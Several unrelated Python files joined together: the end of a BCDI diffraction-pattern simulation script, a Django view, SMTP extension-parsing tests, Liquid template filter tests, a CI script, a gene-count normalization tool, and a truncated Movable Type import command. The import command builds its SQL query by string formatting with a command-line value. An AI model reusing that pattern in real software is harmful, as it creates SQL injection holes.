oscillation_period = 100 # in pixels
z, y, x = np.meshgrid(
np.cos(np.arange(-nz // 2, nz // 2, 1) * 2 * np.pi / oscillation_period),
np.cos(np.arange(-ny // 2, ny // 2, 1) * 2 * np.pi / oscillation_period),
np.cos(np.arange(-nx // 2, nx // 2, 1) * 2 * np.pi / oscillation_period),
indexing="ij",
)
phase = z + y + x
if debug and not flat_phase:
gu.multislices_plot(
phase,
sum_frames=False,
plot_colorbar=True,
width_z=200,
width_y=200,
width_x=200,
vmin=-phase_range,
vmax=phase_range,
cmap=my_cmap,
title="Phase before wrapping\n",
)
phase = util.wrap(phase, start_angle=-np.pi, range_angle=2 * np.pi)
support[abs(amp) < support_threshold * abs(amp).max()] = 0
del amp
volume = support.sum() * voxel_size ** 3 # in nm3
print("estimated volume", volume, " nm3")
phase[support == 0] = 0
if ref_axis_outplane == "x":
_, _, strain = np.gradient(
planar_dist / (2 * np.pi) * phase, voxel_size
) # q is along x after rotating the crystal
elif ref_axis_outplane == "y":
_, strain, _ = np.gradient(
planar_dist / (2 * np.pi) * phase, voxel_size
) # q is along y after rotating the crystal
elif ref_axis_outplane == "z":
strain, _, _ = np.gradient(
planar_dist / (2 * np.pi) * phase, voxel_size
) # q is along y after rotating the crystal
else: # default is ref_axis_outplane = "y"
_, strain, _ = np.gradient(
planar_dist / (2 * np.pi) * phase, voxel_size
) # q is along y after rotating the crystal
# remove the outer layer of support for saving, because strain is undefined there
coordination_matrix = pu.calc_coordination(support, debugging=debug)
surface = np.copy(support)
surface[coordination_matrix > 23] = 0 # remove the bulk 22
bulk = support - surface
bulk[np.nonzero(bulk)] = 1
if debug and not flat_phase:
gu.multislices_plot(
surface,
sum_frames=False,
plot_colorbar=False,
width_z=200,
width_y=200,
width_x=200,
vmin=0,
vmax=1,
cmap=my_cmap,
title="surface",
)
surface = np.multiply(surface, strain)
gu.multislices_plot(
surface,
sum_frames=False,
plot_colorbar=True,
width_z=200,
width_y=200,
width_x=200,
vmin=-strain_range,
vmax=strain_range,
cmap=my_cmap,
title="surface strain",
)
gu.multislices_plot(
support,
sum_frames=True,
plot_colorbar=False,
cmap=my_cmap,
title="Orthogonal support\n",
)
gu.multislices_plot(
phase,
sum_frames=False,
plot_colorbar=True,
width_z=200,
width_y=200,
width_x=200,
vmin=-phase_range,
vmax=phase_range,
cmap=my_cmap,
title="Orthogonal phase",
)
strain[bulk == 0] = 0 # for easier visualization
if save_fig:
plt.savefig(
datadir
+ "S"
+ str(scan)
+ "_phase_"
+ str("{:.0e}".format(photon_number))
+ comment
+ ".png"
)
if save_data:
np.savez_compressed(
datadir + "S" + str(scan) + "_amp-phase-strain_SIMU" + comment,
amp=support,
phase=phase,
bulk=bulk,
strain=strain,
)
# save amp & phase to VTK
# in VTK, x is downstream, y vertical, z inboard,
# thus need to flip the last axis
gu.save_to_vti(
filename=os.path.join(
datadir, "S" + str(scan) + "_amp-phase-strain_SIMU" + comment + ".vti"
),
voxel_size=(voxel_size, voxel_size, voxel_size),
tuple_array=(support, bulk, phase, strain),
tuple_fieldnames=("amp", "bulk", "phase", "strain"),
amplitude_threshold=0.01,
)
gu.multislices_plot(
strain,
sum_frames=False,
plot_colorbar=True,
width_z=200,
width_y=200,
width_x=200,
vmin=-strain_range,
vmax=strain_range,
cmap=my_cmap,
title="strain",
)
if save_fig:
plt.savefig(
datadir
+ "S"
+ str(scan)
+ "_strain_"
+ str("{:.0e}".format(photon_number))
+ comment
+ ".png"
)
del strain, bulk, surface, coordination_matrix
gc.collect()
##############################################################################
# rotate the object to have q in the same direction as during the experiment #
##############################################################################
if rotate_crystal:
print("\nRotating the crystal to match experimental conditions")
if ref_axis_outplane == "x":
myaxis = np.array([1, 0, 0]) # must be in [x, y, z] order
elif ref_axis_outplane == "y":
myaxis = np.array([0, 1, 0]) # must be in [x, y, z] order
elif ref_axis_outplane == "z":
myaxis = np.array([0, 0, 1]) # must be in [x, y, z] order
else:
ref_axis_outplane = "y"
myaxis = np.array([0, 1, 0]) # must be in [x, y, z] order
print("Q aligned along ", ref_axis_outplane, ":", myaxis)
angle = simu.angle_vectors(
ref_vector=np.array([q[2], q[1], q[0]]) / np.linalg.norm(q), test_vector=myaxis
)
print("Angle between q and", ref_axis_outplane, "=", angle, "deg")
print("Angle with y in zy plane", np.arctan(q[0] / q[1]) * 180 / np.pi, "deg")
print("Angle with y in xy plane", np.arctan(-q[2] / q[1]) * 180 / np.pi, "deg")
print("Angle with z in xz plane", 180 + np.arctan(q[2] / q[0]) * 180 / np.pi, "deg")
support, phase = util.rotate_crystal(
arrays=(support, phase),
axis_to_align=myaxis,
debugging=(True, False),
title=("support", "phase"),
reference_axis=np.array([q[2], q[1], q[0]]) / np.linalg.norm(q),
)
original_obj = support * np.exp(1j * phase)
del phase, support
gc.collect()
###################################################
# compensate padding in order to keep reciprocal #
# space resolution (detector pixel size) constant #
###################################################
# compensate padding in real space
print("\nOriginal voxel size", voxel_size, "nm")
dqz = 2 * np.pi / (nz * voxel_size * 10) # in inverse angstroms
dqy = 2 * np.pi / (ny * voxel_size * 10) # in inverse angstroms
dqx = 2 * np.pi / (nx * voxel_size * 10) # in inverse angstroms
print(
"Original reciprocal space resolution (z, y, x): (",
str("{:.5f}".format(dqz)),
"A-1,",
str("{:.5f}".format(dqy)),
"A-1,",
str("{:.5f}".format(dqx)),
"A-1 )",
)
print(
"Original q range (z, y, x): (",
str("{:.5f}".format(dqz * nz)),
"A-1,",
str("{:.5f}".format(dqy * ny)),
"A-1,",
str("{:.5f}".format(dqx * nx)),
"A-1 )\n",
)
dqz_pad = 2 * np.pi / (pad_size[0] * voxel_size * 10) # in inverse angstroms
dqy_pad = 2 * np.pi / (pad_size[1] * voxel_size * 10) # in inverse angstroms
dqx_pad = 2 * np.pi / (pad_size[2] * voxel_size * 10) # in inverse angstroms
print(
"Reciprocal space resolution (z, y, x) after padding: (",
str("{:.5f}".format(dqz_pad)),
"A-1,",
str("{:.5f}".format(dqy_pad)),
"A-1,",
str("{:.5f}".format(dqx_pad)),
"A-1 )",
)
print(
"q range after padding (z, y, x): (",
str("{:.5f}".format(dqz_pad * pad_size[0])),
"A-1,",
str("{:.5f}".format(dqy_pad * pad_size[1])),
"A-1,",
str("{:.5f}".format(dqx_pad * pad_size[2])),
"A-1 )\n",
)
voxelsize_z = 2 * np.pi / (pad_size[0] * dqz_pad * 10) # in nm
voxelsize_y = 2 * np.pi / (pad_size[1] * dqy_pad * 10) # in nm
voxelsize_x = 2 * np.pi / (pad_size[2] * dqx_pad * 10) # in nm
print(
"Real-space voxel sizes (z, y, x) after padding: (",
str("{:.2f}".format(voxelsize_z)),
"nm,",
str("{:.2f}".format(voxelsize_y)),
"nm,",
str("{:.2f}".format(voxelsize_x)),
"nm )",
)
print("Padding has no effect on real-space voxel size.\n")
print(
"Interpolating the object to keep the q resolution constant "
"(i.e. the detector pixel size constant)."
)
print("Multiplication factor for the real-space voxel size: pad_size/original_size")
# compensate change in detector distance
comment = comment + "_sdd_" + str("{:.2f}".format(simulated_sdd))
print("\nCurrent detector pixel size", detector.unbinned_pixel_size[0] * 1e6, "um")
print(
"Detector pixel size to compensate the change in detector distance",
str(
"{:.2f}".format(
detector.unbinned_pixel_size[0] * 1e6 * original_sdd / simulated_sdd
)
),
"um",
)
print(
"Reciprocal space resolution before detector distance change (z, y, x): (",
str("{:.5f}".format(dqz)),
"A-1,",
str("{:.5f}".format(dqy)),
"A-1,",
str("{:.5f}".format(dqx)),
"A-1 )",
)
print(
"q range before detector distance change (z, y, x): (",
str("{:.5f}".format(dqz * nz)),
"A-1,",
str("{:.5f}".format(dqy * ny)),
"A-1,",
str("{:.5f}".format(dqx * nx)),
"A-1 )",
)
voxelsize_z = 2 * np.pi / (nz * dqz * 10) # in nm
voxelsize_y = 2 * np.pi / (ny * dqy * 10) # in nm
voxelsize_x = 2 * np.pi / (nx * dqx * 10) # in nm
print(
"Real-space voxel sizes before detector distance change (z, y, x): (",
str("{:.2f}".format(voxelsize_z)),
"nm,",
str("{:.2f}".format(voxelsize_y)),
"nm,",
str("{:.2f}".format(voxelsize_x)),
"nm )\n",
)
dqz_simu, dqy_simu, dqx_simu = (
dqz * original_sdd / simulated_sdd,
dqy * original_sdd / simulated_sdd,
dqx * original_sdd / simulated_sdd,
)
print(
"Reciprocal space resolution after detector distance change (z, y, x): (",
str("{:.5f}".format(dqz_simu)),
"A-1,",
str("{:.5f}".format(dqy_simu)),
"A-1,",
str("{:.5f}".format(dqx_simu)),
"A-1 )",
)
print(
"q range after detector distance change (z, y, x): (",
str("{:.5f}".format(dqz_simu * nz)),
"A-1,",
str("{:.5f}".format(dqy_simu * ny)),
"A-1,",
str("{:.5f}".format(dqx_simu * nx)),
"A-1 )",
)
voxelsize_z = 2 * np.pi / (nz * dqz_simu * 10) # in nm
voxelsize_y = 2 * np.pi / (ny * dqy_simu * 10) # in nm
voxelsize_x = 2 * np.pi / (nx * dqx_simu * 10) # in nm
print(
"Real-space voxel sizes after detector distance change (z, y, x): (",
str("{:.2f}".format(voxelsize_z)),
"nm,",
str("{:.2f}".format(voxelsize_y)),
"nm,",
str("{:.2f}".format(voxelsize_x)),
"nm )\n",
)
# interpolate the support
if pad_ortho: # pad before interpolating into detector frame
# this is the only choice if the compensated object is larger
# than the initial array shape
print(
"Padding to data size: ",
pad_size,
" before interpolating into the detector frame",
)
nz_interp = pad_size[0]
ny_interp = pad_size[1]
nx_interp = pad_size[2]
if pad_size[0] < nz or pad_size[1] < ny or pad_size[2] < nx:
print("Pad size smaller than initial array size")
sys.exit()
original_obj = util.crop_pad(original_obj, pad_size)
else: # pad after interpolating into detector frame - saves memory
nz_interp = nz
ny_interp = ny
nx_interp = nx
newz, newy, newx = np.meshgrid(
np.arange(-nz_interp // 2, nz_interp // 2, 1) * voxel_size,
np.arange(-ny_interp // 2, ny_interp // 2, 1) * voxel_size,
np.arange(-nx_interp // 2, nx_interp // 2, 1) * voxel_size,
indexing="ij",
)
if sdd_change_mode == "real_space":
print(
"Interpolating the real-space object to accomodate "
"the change in detector distance."
)
print(
"Multiplication factor for the real-space voxel size: "
"original_sdd / simulated_sdd\n"
)
# if the detector is 2 times farther away, the pixel size is two times smaller
# (2 times better sampling) hence the q range is two times smaller and the
# real-space voxel size two times larger
rgi = RegularGridInterpolator(
(
np.arange(-nz_interp // 2, nz_interp // 2)
* voxel_size
* pad_size[0]
/ nz_interp
* original_sdd
/ simulated_sdd,
np.arange(-ny_interp // 2, ny_interp // 2)
* voxel_size
* pad_size[1]
/ ny_interp
* original_sdd
/ simulated_sdd,
np.arange(-nx_interp // 2, nx_interp // 2)
* voxel_size
* pad_size[2]
/ nx_interp
* original_sdd
/ simulated_sdd,
),
original_obj,
method="linear",
bounds_error=False,
fill_value=0,
)
else: # 'reciprocal_space'
rgi = RegularGridInterpolator(
(
np.arange(-nz_interp // 2, nz_interp // 2)
* voxel_size
* pad_size[0]
/ nz_interp,
np.arange(-ny_interp // 2, ny_interp // 2)
* voxel_size
* pad_size[1]
/ ny_interp,
np.arange(-nx_interp // 2, nx_interp // 2)
* voxel_size
* pad_size[2]
/ nx_interp,
),
original_obj,
method="linear",
bounds_error=False,
fill_value=0,
)
obj = rgi(
np.concatenate(
(
newz.reshape((1, newz.size)),
newy.reshape((1, newz.size)),
newx.reshape((1, newz.size)),
)
).transpose()
)
del newx, newy, newz, rgi
gc.collect()
obj = obj.reshape((nz_interp, ny_interp, nx_interp)).astype(original_obj.dtype)
if debug:
gu.multislices_plot(
abs(obj),
sum_frames=True,
cmap=my_cmap,
title="Orthogonal support interpolated for \npadding & detector distance "
"change compensation\n",
)
if orthogonal_frame:
data = fftshift(abs(fftn(original_obj)) ** 2)
data = data / data.sum() * photon_number # convert into photon number
gu.multislices_plot(
data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-5,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="FFT before padding & detector distance change\n",
)
del original_obj, data
gc.collect()
else:
del original_obj
gc.collect()
###################################################
# interpolate the object back into detector frame #
###################################################
if not orthogonal_frame:
if debug:
original_obj = setup.detector_frame(
obj=original_obj,
voxel_size=voxel_size,
debugging=debug,
title="Original object",
)
data = fftshift(abs(fftn(original_obj)) ** 2)
gu.multislices_plot(
data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-5,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="FFT before padding & detector distance change\n",
)
del original_obj, data
gc.collect()
obj = setup.detector_frame(
obj=obj, voxel_size=voxel_size, debugging=debug, title="Rescaled object"
)
#################################################################
# uncomment this if you want to save the non-orthogonal support #
# in that case pad_size and crop_size should be identical #
#################################################################
# support = abs(obj)
# support = support / support.max()
# support[support < 0.05] = 0
# support[np.nonzero(support)] = 1
# np.savez_compressed(datadir + 'S' + str(scan) +
# 'support_nonortho400.npz', obj=support)
##############################################################
# pad the array (after interpolation because of memory cost) #
##############################################################
if not pad_ortho:
print(
"Padding to data size: ",
pad_size,
" after interpolating into the detector frame",
)
if pad_size[0] < nz or pad_size[1] < ny or pad_size[2] < nx:
print("Pad size smaller than initial array size")
sys.exit()
newobj = util.crop_pad(obj, pad_size)
else:
newobj = obj
nz, ny, nx = newobj.shape
comment = comment + "_pad_" + str(nz) + "," + str(ny) + "," + str(nx)
del obj
gc.collect()
gu.multislices_plot(
abs(newobj), sum_frames=True, cmap=my_cmap, title="Support before FFT calculation"
)
if save_fig:
plt.savefig(
datadir + "S" + str(scan) + "_support_before_FFT" + comment + "_sum.png"
)
###########################################
# normalize and apply amplitude threshold #
###########################################
newobj = newobj / abs(newobj).max()
newobj[abs(newobj) < support_threshold] = 0
#####################################
# calculate the diffraction pattern #
#####################################
data = fftshift(abs(fftn(newobj)) ** 2)
gu.multislices_plot(
data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-5,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="FFT on the padded object\n",
)
del newobj
gc.collect()
#################################################################################
# interpolate the diffraction pattern to accomodate change in detector distance #
#################################################################################
if (sdd_change_mode == "reciprocal_space") and (original_sdd != simulated_sdd):
print(
"Interpolating the diffraction pattern to accomodate "
"the change in detector distance."
)
print(
"Multiplication factor for the detector pixel size: "
"simulated_sdd/original_sdd\n"
)
# if the detector is 2 times farther away,
# the pixel size is two times smaller (2 times better sampling)
# and the q range is two times smaller
newz, newy, newx = np.meshgrid(
np.arange(-nz // 2, nz // 2, 1) * dqz,
np.arange(-ny // 2, ny // 2, 1) * dqy,
np.arange(-nx // 2, nx // 2, 1) * dqx,
indexing="ij",
)
rgi = RegularGridInterpolator(
(
np.arange(-nz // 2, nz // 2) * dqz * simulated_sdd / original_sdd,
np.arange(-ny // 2, ny // 2) * dqy * simulated_sdd / original_sdd,
np.arange(-nx // 2, nx // 2) * dqx * simulated_sdd / original_sdd,
),
data,
method="linear",
bounds_error=False,
fill_value=0,
)
simu_data = rgi(
np.concatenate(
(
newz.reshape((1, newz.size)),
newy.reshape((1, newz.size)),
newx.reshape((1, newz.size)),
)
).transpose()
)
del newx, newy, newz, rgi
gc.collect()
simu_data = simu_data.reshape((nz, ny, nx)).astype(data.dtype)
gu.multislices_plot(
simu_data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-5,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="FFT for simulated detector distance\n",
)
else:
simu_data = data
del data
gc.collect()
#######################################################
# convert into photons and apply the photon threshold #
#######################################################
simu_data = simu_data / simu_data.sum() * photon_number # convert into photon number
mask = np.zeros((nz, ny, nx))
mask[simu_data <= photon_threshold] = 1
simu_data[simu_data <= photon_threshold] = 0
temp_data = np.rint(simu_data).astype(int)
filled_pixels = (temp_data != 0).sum()
print("Number of pixels filled with non-zero intensity= ", filled_pixels)
del temp_data
gc.collect()
gu.multislices_plot(
simu_data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-5,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="FFT converted into photons\n",
)
if save_fig:
plt.savefig(
datadir
+ "S"
+ str(scan)
+ "_diff_float_"
+ str("{:.0e}".format(photon_number))
+ comment
+ "_sum.png"
)
#########################
# include Poisson noise #
#########################
if include_noise:
simu_data = np.rint(poisson(simu_data)).astype(int)
comment = comment + "_noise"
else:
simu_data = np.rint(simu_data).astype(int)
#####################
# add detector gaps #
#####################
if set_gap:
comment = comment + "_gap" + str(gap_pixel_start)
simu_data, mask = simu.gap_detector(
data=simu_data, mask=mask, start_pixel=gap_pixel_start, width_gap=gap_width
)
else:
comment = comment + "_nogap"
gu.multislices_plot(
simu_data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-1,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="FFT after rounding",
)
myfig, _, _ = gu.multislices_plot(
simu_data,
sum_frames=True,
scale="log",
plot_colorbar=True,
vmin=-1,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="Masked intensity",
)
myfig.text(0.60, 0.30, "Pad size =" + str(pad_size), size=20)
if save_fig:
myfig.savefig(
datadir
+ "S"
+ str(scan)
+ "_diff_"
+ str("{:.0e}".format(photon_number))
+ comment
+ "_sum.png"
)
#################################################
# crop arrays to obtain the final detector size #
#################################################
voxelsizez_crop = 2 * np.pi / (crop_size[0] * dqz_simu * 10) # in nm
voxelsizey_crop = 2 * np.pi / (crop_size[1] * dqy_simu * 10) # in nm
voxelsizex_crop = 2 * np.pi / (crop_size[2] * dqx_simu * 10) # in nm
print(
"Real-space voxel sizes (z, y, x) after cropping: (",
str("{:.2f}".format(voxelsizez_crop)),
"nm,",
str("{:.2f}".format(voxelsizey_crop)),
"nm,",
str("{:.2f}".format(voxelsizex_crop)),
"nm )",
)
nz, ny, nx = simu_data.shape
nz_crop, ny_crop, nx_crop = crop_size
if nz < nz_crop or ny < ny_crop or nx < nx_crop:
print("Crop size larger than initial array size")
sys.exit()
simu_data = util.crop_pad(simu_data, crop_size)
mask = util.crop_pad(mask, crop_size)
##########################################################
# crop arrays to fulfill FFT requirements during phasing #
##########################################################
nz, ny, nx = simu_data.shape
nz_crop, ny_crop, nx_crop = util.smaller_primes(
(nz, ny, nx), maxprime=7, required_dividers=(2,)
)
simu_data = util.crop_pad(simu_data, (nz_crop, ny_crop, nx_crop))
mask = util.crop_pad(mask, (nz_crop, ny_crop, nx_crop))
nz, ny, nx = simu_data.shape
print("cropped FFT data size:", simu_data.shape)
print("Total number of photons:", simu_data.sum())
comment = comment + "_crop_" + str(nz) + "," + str(ny) + "," + str(nx)
##############
# save files #
##############
if save_data:
np.savez_compressed(
datadir
+ "S"
+ str(scan)
+ "_diff_"
+ str("{:.0e}".format(photon_number))
+ comment,
data=simu_data,
)
np.savez_compressed(
datadir
+ "S"
+ str(scan)
+ "_mask_"
+ str("{:.0e}".format(photon_number))
+ comment,
mask=mask,
)
#####################################
# plot mask and diffraction pattern #
#####################################
plt.ioff()
if debug:
gu.multislices_plot(
mask,
sum_frames=True,
scale="linear",
plot_colorbar=False,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="Mask",
)
myfig, _, _ = gu.multislices_plot(
simu_data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-1,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="Masked intensity",
)
myfig.text(0.60, 0.35, "Pad size =" + str(pad_size), size=20)
myfig.text(0.60, 0.30, "Crop size =" + str(crop_size), size=20)
myfig.text(0.60, 0.25, "Filled pixels =" + str(filled_pixels), size=20)
myfig.text(
0.60,
0.20,
"Detector distance =" + str("{:.5f}".format(simulated_sdd)) + " m",
size=20,
)
myfig.text(
0.60,
0.15,
"Voxel size ="
+ str("{:.2f}".format(voxelsizez_crop))
+ ", "
+ str("{:.2f}".format(voxelsizey_crop))
+ ", "
+ str("{:.2f}".format(voxelsizex_crop))
+ " nm",
size=20,
)
myfig.text(0.60, 0.10, "Volume =" + str(volume) + " nm3", size=20)
if set_gap:
myfig.text(0.60, 0.05, "Gap width =" + str(gap_width) + " pixels", size=20)
if save_fig:
myfig.savefig(
datadir
+ "S"
+ str(scan)
+ "_diff_"
+ str("{:.0e}".format(photon_number))
+ comment
+ "_center.png"
)
myfig, _, _ = gu.multislices_plot(
simu_data,
sum_frames=True,
scale="log",
plot_colorbar=True,
vmin=-1,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="Masked intensity",
)
myfig.text(0.60, 0.35, "Pad size =" + str(pad_size), size=20)
myfig.text(0.60, 0.30, "Crop size =" + str(crop_size), size=20)
myfig.text(0.60, 0.25, "Filled pixels =" + str(filled_pixels), size=20)
myfig.text(
0.60,
0.20,
"Detector distance =" + str("{:.5f}".format(simulated_sdd)) + " m",
size=20,
)
myfig.text(
0.60,
0.15,
"Voxel size ="
+ str("{:.2f}".format(voxelsizez_crop))
+ ", "
+ str("{:.2f}".format(voxelsizey_crop))
+ ", "
+ str("{:.2f}".format(voxelsizex_crop))
+ " nm",
size=20,
)
myfig.text(0.60, 0.10, "Volume =" + str(volume) + " nm3", size=20)
if set_gap:
myfig.text(0.60, 0.05, "Gap width =" + str(gap_width) + " pixels", size=20)
if save_fig:
myfig.savefig(
datadir
+ "S"
+ str(scan)
+ "_diff_"
+ str("{:.0e}".format(photon_number))
+ comment
+ "_sum.png"
)
plt.show()
|
python
|
from django.shortcuts import render
from django.views.generic import View
class IndexView(View):
""" An index view"""
template_name = "base.html"
def get(self, request):
""" GET to return a simple template """
return render(
request, self.template_name
)
|
python
|
"""
Tests for ESMTP extension parsing.
"""
from aiosmtplib.esmtp import parse_esmtp_extensions
def test_basic_extension_parsing():
response = """size.does.matter.af.MIL offers FIFTEEN extensions:
8BITMIME
PIPELINING
DSN
ENHANCEDSTATUSCODES
EXPN
HELP
SAML
SEND
SOML
TURN
XADR
XSTA
ETRN
XGEN
SIZE 51200000
"""
extensions, auth_types = parse_esmtp_extensions(response)
assert "size" in extensions
assert extensions["size"] == "51200000"
assert "saml" in extensions
assert "size.does.matter.af.mil" not in extensions
assert auth_types == []
def test_no_extension_parsing():
response = """size.does.matter.af.MIL offers ZERO extensions:
"""
extensions, auth_types = parse_esmtp_extensions(response)
assert extensions == {}
assert auth_types == []
def test_auth_type_parsing():
response = """blah blah blah
AUTH FOO BAR
"""
extensions, auth_types = parse_esmtp_extensions(response)
assert "foo" in auth_types
assert "bar" in auth_types
assert "bogus" not in auth_types
def test_old_school_auth_type_parsing():
response = """blah blah blah
AUTH=PLAIN
"""
extensions, auth_types = parse_esmtp_extensions(response)
assert "plain" in auth_types
assert "cram-md5" not in auth_types
def test_mixed_auth_type_parsing():
response = """blah blah blah
AUTH=PLAIN
AUTH CRAM-MD5
"""
extensions, auth_types = parse_esmtp_extensions(response)
assert "plain" in auth_types
assert "cram-md5" in auth_types
|
python
|
import pytest
from liquid import *
def test_register_filter():
@filter_manager.register(mode='python')
def incr(base, inc=1):
return base + inc
liq = Liquid('{{ 2 | incr}}', dict(mode='python'))
assert liq.render() == '3'
liq = Liquid('{{ 2 | incr:2}}', dict(mode='python'))
assert liq.render() == '4'
liq = Liquid('{{ 2 | incr:inc=3}}', dict(mode='python'))
assert liq.render() == '5'
liq = Liquid('{{ 2 | incr}}', dict(mode='standard'))
with pytest.raises(LiquidRenderError):
liq.render()
def test_unregister_filter():
incr = filter_manager.unregister('incr', mode='python')
assert incr(1) == 2
with pytest.raises(LiquidFilterRegistryException):
filter_manager.unregister('incr_no_such', mode='python')
def test_complex_filters():
assert LiquidPython(
'{{path | @__import__("pathlib").Path | getattr: "stem"}}'
).render(
path='/a/b/cde.txt'
) == 'cde'
assert LiquidPython(
'{{path | @__import__("pathlib").Path | getattr: "stem" | getitem: 0}}'
).render(
path='/a/b/cde.txt'
) == 'c'
def test_render():
assert LiquidPython('{{ tpl | render }}').render(
tpl="{{x}}",
x=1
) == '1'
assert LiquidPython('{{ tpl | render: x=2 }}').render(
tpl="{{x}}",
x=1
) == '2'
assert LiquidPython('{{ tpl | render: x="foo" }}').render(
tpl="{{x | len}}",
x=1
) == '3'
with pytest.raises(LiquidRenderError):
assert LiquidPython('{{ tpl | render: x=2 }}').render(
tpl=[],
x=1
)
|
python
|
#!/usr/bin/env python
import os
import json
with open(os.path.join(os.environ['BOOST_CI_SRC_FOLDER'], 'meta', 'libraries.json')) as jsonFile:
lib_data = json.load(jsonFile)
print(lib_data['key'])
|
python
|
#!/usr/bin/env python2.7
import sys
import argparse
import gzip
import clsnaputil
#assumes you already have the AUCs
#pulled out using:
#wiggletools print non_unique_base_coverage.bw.auc AUC non_unique_base_coverage.bw
RECOUNT_TARGET = 40 * 1000000
SNAPTRON_FORMAT_CHR_COL = 1
SNAPTRON_FORMAT_COUNT_COL = 11
def load_metadata(args):
has_base_coverage_column = False
with open(args.metadata_file,"rb") as fin:
lines = fin.read()
lines = lines.split('\n')
fields = lines[1].split('\t')
if lines[len(lines)-1] == '':
lines.pop()
if args.auc_col == -1:
args.auc_col = len(fields) - 1
aucs = {}
zero_aucs = set()
sids = []
for x in lines:
fields = x.split('\t')
if fields[0] == 'rail_id':
has_base_coverage_column = fields[-1] == 'has_base_coverage'
if has_base_coverage_column and args.auc_col == len(fields) - 1:
args.auc_col -= 1
continue
if not has_base_coverage_column or fields[-1] == 'true':
#print fields[args.auc_col]
aucs[fields[args.sample_id_col]]=fields[args.auc_col]
#a few samples may have a AUC of 0, slightly offset them so the division goes through
if float(fields[args.auc_col]) == 0.0:
zero_aucs.add(fields[args.sample_id_col])
aucs[fields[args.sample_id_col]] = '0.00000001'
sids.append(fields[args.sample_id_col])
return (aucs, sids, zero_aucs)
def normalize_counts(args, aucs, sids, zero_aucs):
header = {}
if args.snaptron_format:
sys.stdout.write("gene_id")
[sys.stdout.write("\t"+x) for x in sids]
sys.stdout.write("\n")
zero_auc_positions = []
zlength1 = len(zero_aucs)
zlength2 = 0
#with gzip.open(args.counts_file,"rb") as fin:
if True:
#maps column position
for line in sys.stdin:
fields = None
fields__ = line.rstrip().split('\t')
if args.snaptron_format:
gene_id = fields__[SNAPTRON_FORMAT_CHR_COL] + ':' + '-'.join(fields__[SNAPTRON_FORMAT_CHR_COL+1:SNAPTRON_FORMAT_CHR_COL+3])
if args.id_type == 'gene_id':
gene_id = fields__[SNAPTRON_FORMAT_COUNT_COL-1].split(':')[0]
fields = {sid:0 for sid in sids}
for sample in fields__[SNAPTRON_FORMAT_COUNT_COL].split(',')[1:]:
(sid, count) = sample.split(':')
fields[sid] = int(count)
else:
gene_id = fields__[0]
if gene_id == 'gene_id' or gene_id == 'Group':
sys.stdout.write(line)
sids = fields__[args.count_start_col:]
continue
else:
fields = {sids[i]:int(float(count)) for (i,count) in enumerate(fields__[args.count_start_col:])}
if zlength2 == 0 and zlength1 > 0:
zero_auc_positions = [z for (z,sid) in enumerate(sids) if sid in zero_aucs]
zlength2 = len(zero_auc_positions)
fields = [int(clsnaputil.round_like_R((RECOUNT_TARGET * float(fields[sid]))/float(aucs[sid]),0)) for sid in sids]
#adjust normalized count for those samples with 0 AUC, should be a relatively small set
for zpos in zero_auc_positions:
fields[zpos] = 0
if args.skip_0_rows:
zeros = [1 for x in fields if x == 0]
if len(zeros) == len(fields):
continue
sys.stdout.write(gene_id+"\t"+"\t".join(map(str,fields))+"\n")
def main():
parser = argparse.ArgumentParser(description='Normalization of raw counts')
#parser.add_argument('--counts-file', metavar='/path/to/counts_file', type=str, default=None, help='path to a TSV file with matrix of counts', required=True)
parser.add_argument('--metadata-file', metavar='/path/to/sample_metadata_file', type=str, default=None, help='path to a TSV file with the Snaptron sample metadata', required=True)
parser.add_argument('--auc-col', metavar='-1', type=int, default=-1, help='which column in the sample metadata contains the AUC, default is the last')
parser.add_argument('--count-start-col', metavar='1', type=int, default=1, help='which column in the raw coverage file start the counts')
parser.add_argument('--sample-id-col', metavar='0', type=int, default=0, help='which column in the sample metadata contains the joining ID')
parser.add_argument('--snaptron-format', action='store_const', const=True, default=False, help='if gene raw counts file is coming from the genes Snaptron formatted DB')
parser.add_argument('--id-type', metavar='how to format the ID field', type=str, default='gene_id', help='what kind of row ID to use: "gene_id" (default), "coord"; only matters if --snaptron-format is also passed in')
parser.add_argument('--skip-0-rows', action='store_const', const=True, default=False, help='if all normalized counts in a row are zeros, drop the row from output')
args = parser.parse_args()
if args.snaptron_format:
args.count_start_col = 0
(aucs, sids, zero_aucs) = load_metadata(args)
normalize_counts(args, aucs, sids, zero_aucs)
if __name__ == '__main__':
main()
|
python
|
from optparse import make_option
import os
import shutil
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
import MySQLdb
from blog.models import Blog, Post, Asset
class Command(BaseCommand):
help = 'Import blog posts from Movable Type'
option_list = BaseCommand.option_list + (
make_option('-d',
dest='database',
help='The MT database name'),
make_option('-u',
dest='user',
help='The MT database user'),
make_option('-p',
dest='password',
help='The MT database password'),
make_option('-r',
dest='root',
help='The MT root directory (for copying image files)'),
make_option('-i',
dest='src_blog_id',
help='The MT blog ID to copy'),
make_option('-b',
dest='dst_blog_id',
help='The Django destionation blog id. Should exist.'))
def handle(self, *args, **options):
blog = Blog.objects.get(id=options['dst_blog_id'])
blog.ensure_assets_directory()
db = MySQLdb.Connect(db=options['database'], user=options['user'], passwd=options['password'])
entry_cursor = db.cursor()
entry_cursor.execute('''
select e.entry_id, e.entry_basename, e.entry_modified_on, e.entry_title, e.entry_text,
a.author_basename, a.author_email, a.author_nickname
from mt_entry as e, mt_author as a
where e.entry_blog_id = %s
and e.entry_author_id = a.author_id''' % options['src_blog_id'])
print list(entry_cursor)
for row in list(entry_cursor):
